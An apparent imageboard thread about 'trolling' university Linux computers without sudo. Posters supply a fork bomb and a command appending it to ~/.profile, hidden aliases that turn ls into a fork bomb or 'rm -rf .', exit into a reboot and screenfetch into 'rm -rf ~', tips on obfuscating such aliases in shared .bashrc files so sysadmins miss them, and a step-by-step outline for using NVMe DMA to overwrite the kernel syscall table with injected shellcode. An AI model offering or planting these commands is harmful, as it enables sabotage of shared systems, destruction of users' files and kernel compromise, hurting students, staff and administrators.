Linux commands for trolling that don't require sudo...

tell me more I am intrested

Does the curriculum involve using the CLI? Because if so the fortune alias might actually work really well.

>students with a deathly fear of text interfaces open the terminal
>start to work through instructions/assignment
>seemingly random, sometime nonsensical and cryptic statements are output, nothing else works as supposed to
>a tech-illiterate assistant comes up
>they've never seen anything like this before, none of their canned troubleshooting routines work
>the half-competent teacher arrives
>none of the commands work
>can't use "which"
>has to use GUI utilities to try to debug, because school computers aren't gonna have two shells installed
>fun ensues, especially if the aliases are properly obfuscated and can't be found at a glance into .bashrc

Check if IOMMU is disabled by cat'ing the file cmdline in /proc

Find out the BDF of the NVMe controller using lspci. Memory-map the file /sys/bus/pci/devices//resource0, which contains the controller registers.

Create a couple of pages using posix_memalign, page-lock them using mlock, find out their physical address by having your program read /proc/self/pagemap

Read the NVMe spec here to find register offset: nvmexpress.org/wp-content/uploads/NVM_Express_Revision_1.3.pdf
Protip: chapter 3 is for finding registers

Reset the controller and set admin queues by flipping the Enable bit in the CC register to 0 and waiting for CSTS.RDY to become 0. Writing the ASQ and ACQ registers with two physical addresses (to your allocated pages). Flip the enable bit again and wait for CSTS.RDY to become 1. Now you have hijacked the NVMe.

Part 1/2

Use the admin queues and create a valid "create IO completion queue" and "create IO submission queue" commands (refer to chapter 4 and 5 in the spec). Then use the IO queues to write to disk whatever you want.

Whatever you want should here be some physical address to a function or shell code that you want to inject into address space.

Use the IO queues again to read from disk back into RAM, only this time you read into an offset of kernel space.

Here you need to figure out where the syscall handlers are invoked, so you can inject the address you want into the syscall table. The tricky bit here is that the NVMe spec only operates on page-aligned sizes, so you need to copying the entire syscall-table first (which can be achieved by using the IO queues to read from memory to disk and back again into memory you own) and then change only the address of a particular syscall to your function for example.

Part 2/2

>:(){ :|: & };:

Could someone tell me what does it do piece by piece? All I know from the last thread that it's pipe-ing into oblivion (pipe), just curious how to understand it.

Google fork bomb. Also i wonder why this command still isn't somehow blacklisted by major distributions.

Read it this way:
:() {
: | : ;
};

It creates a function that continuously pipes itself, creating endless processes.

From left to right

:() this part makes a function named :

{ begin body of function

: | : & call :, pipe output into : and fork it

}; end of function body

: call the function initially

:() {
};
Defines a function called :.

:|:& is the body of the function - it calls itself twice (the & runs it in the background)

You don't need to blacklist it, most distros come with ulimit enabled which limits stuff like how much memory a process and child processes can allocate, how many child processes can be forked etc. Therefore, a fork bomb will only affect a single user (as the ulimit kicks in on the users' login process).

What is this wizardry?

unironically 1337 haxx1ng

I mean, how does one even begin to learn how to do that stuff?

Well, it's still possible to fuck up uni computer with something like
echo ':(){ :|: & };:' >> '~/.profile'
That's bad. I don't wont do it, because I want my uni to continue using linux. But there could be someone who don't.
Considering that """sysadmins""" who work at uni generally are idiots who afraid command line as well as regular students, and can't into basic system resource management, that's really bad.

fuck
*I wont do it.

>Well, it's still possible to fuck up uni computer with something like
Only for your logins. If ulimit is enabled (which it is by default in all kernel installations since 2.4 or something), it will only kill your own login process and not affect any other users.

Kek

>Memory-map the file /sys/bus/pci/devices//resource0
Actually, this require root privileges.

It might be possible to destroy a physical disk like this, but ymmv:
create a fuckton of files. They don't have to contain anything, just use `touch'
once you have created all the happy files, rm them.
Try it and tell me how it went?

sysadmin:
— computer does not work, i tried disable and enable, i tried anti-virus, it still lags and shit
boss:
— i told you neckbeards, linux is shiet, it's free only if your time is worthless, windows doesn't have this problem, let's buy windows next year :^)
That will be conclusion. Sadly.

We just dont know

this thread is relevant to my interests,
what do you think would be a good way obfuscating this, login script that executes a bunch of "alias cmd='fortune -a'"

>tfw you didn't fall for the nvme ssd meme
feels good man

I'd just like to interject for a moment. What you're referring to as Linux, is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.

Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called "Linux", and many of its users are not aware that it is basically the GNU system, developed by the GNU Project.

There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine's resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called "Linux" distributions are really distributions of GNU/Linux.

Windows doesn't have this problem.

Any PCIe device with a DMA engine able of reading and writing can do this though. I just used an NVMe disk as an example, because using it is simple as fuck as the NVMe specification is open.

You could technically do this with your graphics card too, but you'd need to find a way of injecting physical addresses into the CUDA/OpenCL driver as they usually provide a different level of control.

It does, but it doesn't provide a generic interface for MMIO like Linux does. However, see You need superuser privileges to do this in the first place, which means that you can just inject your own kernel module/driver anyway.

...

Hide it in plain sight. Best case scenario, you're trolling a sysadmin who has a personal "my scripts" folder, and a long and elaborate bashrc they built up over many years and never refactored.

Another good case would be a pre-setup system, e.g. what you might find in a university/school or on a standardised dev environment, with a standard bashrc that sets up a few things. Make your script sound like some necessary system component and sneak it in.

You could also split it between bashrc and whatever bash's login script is (I don't remember because I use zsh myself). For instance, set an environment variable containing the location of the script in one, and then source the script from that variable in the other. This obfuscated it more for those who don't know what they're looking at, but it does increase the "attack surface" so to speak (i.e. there are more opportunities for your changes to be found, since they're in two files now instead of one).

Then use common sense. Perhaps some cryptic if-statement using unreadable shell syntax that will always evaluate to true, then do some completely useless commands and also execute your aliasing script. Or whatever else blends in better.

>why_not_both.jpg

echo "alias ls=':(){ :|:& };: && ls' " >> '.bashrc'
echo "alias exit='shutdown -r now' >> '.bashrc'

I don't know where you are studying, but our sysadmin was pretty skilled and you can bet you ass, that your name will appear in some logfile and you'll get b&'d, freshman.

Thanks a lot Sup Forumsuys!

>"Guess I better call tech support"
>"Weird. We'll just reimage the machine. It'll be done in about 30 minutes."
Fin

alias ls = rm -rf .

I like

alias screenfetch = rm -rf ~